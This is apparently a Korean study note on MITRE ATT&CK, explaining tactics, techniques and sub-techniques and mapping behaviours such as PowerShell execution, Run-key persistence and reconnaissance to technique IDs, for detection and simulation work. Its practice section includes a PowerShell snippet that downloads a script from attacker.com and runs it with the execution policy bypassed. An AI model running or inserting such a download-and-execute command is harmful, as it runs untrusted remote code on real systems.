1. MITRE ATT&CK란?

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge)는 실제 공격자가 사용하 는 공격 기술(TTPs)을 정리해 놓은 공격 지식베이스이다.

2. ATT&CK 기술 구조 (TTPs)

구성 요소 설명 예시
Tactic (전술) 공격자의 목적 (왜?) Initial Access, Execution, C2 등
Technique (기술) 목표를 달성하는 방법 (어떻게?) T1059 - Command & Scripting Interpreter
Sub-technique (하위 기술) 더 구체적인 실행 방식 T1059.001 - PowerShell

공격자가 PowerShell을 사용해 악성 스크립트를 실행한다면?

이 코드는 모두 MITRE 기술 ID로 표현될 수 있고, 공격 로그 분석, 탐지 룰 작성, BAS 시나리오 생성 시 매우 중요함

3. MITRE ID 예시 표

행위 해당 MITRE 기술
PowerShell 스크립트 실행 T1059.001 – PowerShell
사용자 클릭 유도 (.lnk 등) T1204.002 – User Execution: Malicious File
레지스트리 등록 (Run 키) T1547.001 – Registry Run Key
Reverse Shell 연결 T1071.001 – Web Protocols
whoami, ipconfig 등 시스템 정찰 T1033 – System Owner/User Discovery

MITRE ATT&CK 기반 실습 예시 코드 모음

T1059.001 – PowerShell

Execution 전술 : PowerShell을 통한 명령 실행

# [T1059.001 - PowerShell] PowerShell 스크립트 원격 다운로드 및 실행
Invoke-WebRequest -Uri "<http://attacker.com/payload.ps1>" -OutFile "$env:TEMP\\payload.ps1"
Start-Process powershell -ArgumentList "-ExecutionPolicy Bypass -File $env:TEMP\\payload.ps1"

T1204.002 – User Execution: Malicious File (.lnk 등)